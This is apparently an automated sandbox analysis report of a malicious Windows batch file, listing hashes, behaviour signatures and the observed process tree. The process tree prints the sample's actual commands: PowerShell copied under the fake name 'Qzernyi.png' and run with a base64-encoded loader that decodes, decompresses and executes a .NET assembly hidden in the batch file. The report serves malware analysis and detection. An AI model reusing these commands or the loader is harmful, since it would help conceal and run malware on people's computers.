Analysis
-
max time kernel
121s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
01-12-2023 17:55
Static task
static1
Behavioral task
behavioral1
Sample
8e065b09f518cdc94ede24c50ab9cb712ff54147b089e4267965462a851276c1.bat
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
8e065b09f518cdc94ede24c50ab9cb712ff54147b089e4267965462a851276c1.bat
Resource
win10v2004-20231127-en
General
-
Target
8e065b09f518cdc94ede24c50ab9cb712ff54147b089e4267965462a851276c1.bat
-
Size
1009KB
-
MD5
8e16ec48c40bfd51e6305c1b2f4e9fa8
-
SHA1
24991017d3088f6fc943e11df888591aa34e3055
-
SHA256
8e065b09f518cdc94ede24c50ab9cb712ff54147b089e4267965462a851276c1
-
SHA512
7bbad34c6a6f4d5e8316771ffbad11010d8527f3a713b53f115dfa98d2a7bbc6f4596503a3ada325cebe41d472d7e930311e3734f4f24fec8eb90170b2485eba
-
SSDEEP
24576:W39YCqk2eQc9YQqzQ2ZBLjXyRnMIT98ZsXBHbrQ:Nrk9OtZdzKnMLZ8ZQ
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
Qzernyi.pngpid process 1464 Qzernyi.png -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
Qzernyi.pngpid process 1464 Qzernyi.png -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Qzernyi.pngpid process 1464 Qzernyi.png -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Qzernyi.pngdescription pid process Token: SeDebugPrivilege 1464 Qzernyi.png -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 1036 wrote to memory of 2072 1036 cmd.exe cmd.exe PID 1036 wrote to memory of 2072 1036 cmd.exe cmd.exe PID 1036 wrote to memory of 2072 1036 cmd.exe cmd.exe PID 1036 wrote to memory of 2580 1036 cmd.exe xcopy.exe PID 1036 wrote to memory of 2580 1036 cmd.exe xcopy.exe PID 1036 wrote to memory of 2580 1036 cmd.exe xcopy.exe PID 1036 wrote to memory of 1612 1036 cmd.exe cmd.exe PID 1036 wrote to memory of 1612 1036 cmd.exe cmd.exe PID 1036 wrote to memory of 1612 1036 cmd.exe cmd.exe PID 1612 wrote to memory of 2712 1612 cmd.exe cmd.exe PID 1612 wrote to memory of 2712 1612 cmd.exe cmd.exe PID 1612 wrote to memory of 2712 1612 cmd.exe cmd.exe PID 1612 wrote to memory of 2708 1612 cmd.exe xcopy.exe PID 1612 wrote to memory of 2708 1612 cmd.exe xcopy.exe PID 1612 wrote to memory of 2708 1612 cmd.exe xcopy.exe PID 1612 wrote to memory of 2688 1612 cmd.exe cmd.exe PID 1612 wrote to memory of 2688 1612 cmd.exe cmd.exe PID 1612 wrote to memory of 2688 1612 cmd.exe cmd.exe PID 1612 wrote to memory of 2780 1612 cmd.exe xcopy.exe PID 1612 wrote to memory of 2780 1612 cmd.exe xcopy.exe PID 1612 wrote to memory of 2780 1612 cmd.exe xcopy.exe PID 1612 wrote to memory of 1464 1612 cmd.exe Qzernyi.png PID 1612 wrote to memory of 1464 1612 cmd.exe Qzernyi.png PID 1612 wrote to memory of 1464 1612 cmd.exe Qzernyi.png PID 1612 wrote to memory of 1464 1612 cmd.exe Qzernyi.png
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\8e065b09f518cdc94ede24c50ab9cb712ff54147b089e4267965462a851276c1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "2⤵PID:2072
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Qzernyi.png2⤵PID:2580
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\8e065b09f518cdc94ede24c50ab9cb712ff54147b089e4267965462a851276c1.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:2712
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Qzernyi.png3⤵PID:2708
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:2688
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Users\Admin\AppData\Local\Temp\8e065b09f518cdc94ede24c50ab9cb712ff54147b089e4267965462a851276c1.bat C:\Users\Admin\AppData\Local\Temp\Qzernyi.png.bat3⤵PID:2780
-
C:\Users\Admin\AppData\Local\Temp\Qzernyi.pngC:\Users\Admin\AppData\Local\Temp\Qzernyi.png -win 1 -enc JABUAHYAdwBuAGMAagBpAGIAYQBwAGQAIAA9ACAAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIALgBiAGEAdAAiACkALAAgAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AbABhAHMAdAAgADEAOwAgACQATwBnAGsAbABmACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFQAdgB3AG4AYwBqAGkAYgBhAHAAZAApADsAJABKAG0AagBiAG0AbABiAHkAcABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABPAGcAawBsAGYAIAApADsAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAVABpAG0AYgBnAGkAbgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABKAG0AagBiAG0AbABiAHkAcABlACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABUAGkAbQBiAGcAaQBuAC4AQwBvAHAAeQBUAG8AKAAgACQAbwB1AHQAcAB1AHQAIAApADsAJABUAGkAbQBiAGcAaQBuAC4AQwBsAG8AcwBlACgAKQA7ACQASgBtAGoAYgBtAGwAYgB5AHAAZQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAE8AZwBrAGwAZgAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABPAGcAawBsAGYAKQA7ACAAJABYAHYAaQB2AHUAeQBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAE8AZwBrAGwAZgApADsAIAAkAEkAbgBrAGwAaQBoACAAPQAgACQAWAB2AGkAdgB1AHkAbAAuAEcAZQB0AEUAeABwAG8AcgB0AGUAZABUAHkAcABlAHMAKAApAFsAMABdADsAIAAkAFYAcAB4AG8AeABvAHoAcAAgAD0AIAAkAEkAbgBrAGwAaQBoAC4ARwBlAHQATQBlAHQAaABvAGQAcwAoACkAWwAwAF0ALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAJABuAHUAbABsACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
Filesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f